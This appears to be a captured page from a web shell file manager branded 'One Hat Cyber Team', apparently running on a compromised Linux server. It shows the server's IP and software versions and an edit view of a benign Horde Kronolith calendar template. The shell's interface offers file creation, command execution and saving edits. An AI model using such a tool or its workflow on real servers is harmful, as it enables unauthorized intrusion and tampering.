⚝
One Hat Cyber Team
⚝
Your IP:
216.73.217.4
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
psa-horde
/
kronolith
/
templates
/
week
/
Edit File: head.inc
<table class="kronolith-view kronolithViewDay<?php if ($this->sidebyside) echo ' kronolith-sidebyside' ?>"> <thead class="kronolith-view-head"> <tr> <?php if (!$more_timeslots): ?> <th class="kronolith-first-col"> </th> <?php endif ?> <?php foreach ($this->days as $i => $day): ?> <?php if ($more_timeslots): ?> <th class="kronolith-first-col"> </th> <?php endif ?> <th colspan="<?php echo $day->totalspan ?>"> <?php if (Kronolith::getDefaultCalendar(Horde_Perms::EDIT) && ($GLOBALS['injector']->getInstance('Horde_Core_Perms')->hasAppPermission('max_events') === true || $GLOBALS['injector']->getInstance('Horde_Core_Perms')->hasAppPermission('max_events') > Kronolith::countEvents())) { echo Horde::url('new.php') ->add(array('date' => $day->dateString(), 'url' => Horde::signUrl($this->link(0, true)))) ->link(array('title' => _("Create a New Event"), 'class' => 'iconAdd')) . Horde::img('new_small.png', '+') . '</a>'; } ?> <?php echo $day->link()->link(array('class' => 'widget')) . $day->getTime('%A, %d.') ?></a> </th> <?php endforeach; ?> </tr>
Simpan